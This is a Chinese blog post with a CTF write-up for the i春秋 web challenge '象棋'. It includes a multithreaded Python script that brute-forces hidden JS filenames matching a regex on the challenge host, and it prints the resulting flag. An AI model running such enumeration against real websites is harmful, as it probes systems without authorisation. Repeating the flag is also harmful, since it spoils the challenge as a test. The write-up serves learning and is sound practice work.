CTF-i春秋-Web-象棋

2020.09.17

经验教训

  1. py多线程要引入from multiprocessing.dummy import Pool as ThreadPool

象棋

  1. 打开链接,我下了一把象棋,还赢了,哈哈哈
  2. 查看源码,发现可以js文件,文件名是正则表达式,直接访问会404,所以猜测有满足正则表达式的js文件
  3. 暴力获取正则表达式的文件名,这个正则表达式[abcmlyx]{2}ctf[0-9]{3}[abcmlyx]{2}的意思是连着两个中括号里边的字母,ctf就是ctf,[0-9]{3}是连着三色0-9之间的数字,符合条件的很多,利用脚本多线程进行破解。
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
#fileName  : decry.py
#createTime: 2020/09/17 22:35:41
#author    : 乔悟空
#purpose   : 此脚本用于暴力获取js/[abcmlyx]{2}ctf[0-9]{3}.js正则表达式文件
import requests
from multiprocessing.dummy import Pool as ThreadPool

url = 'http://1f94e221dfdb421698e505e4a482cf249343f4fdd6fb4089.changame.ichunqiu.com/js/'
res1 = 'abcmlyx'
res2 = '0123456789'
reqList = []
for i in res1:
    for j in res1:
        for x in res2:
            for y in res2:
                for m in res2:
                    reqList.append(url+ i+ j+ 'ctf'+ x+ y+ m+ '.js')

def url_open(url):
    try:
        req = requests.get(url)
        if '404' not in req.text:
            print(url+req.text)
    except:
        pass
pool = ThreadPool()
pool.map(url_open,reqList)
pool.close()
pool.join()
  1. 用了好久才出来,文件名是myctf801.js,js文件内容是flag{6af42585-d1f0-4ac5-a653-d8217e13c7ae}
posted @ 2020-09-18 00:27  乔悟空  阅读(912)  评论(0编辑  收藏  举报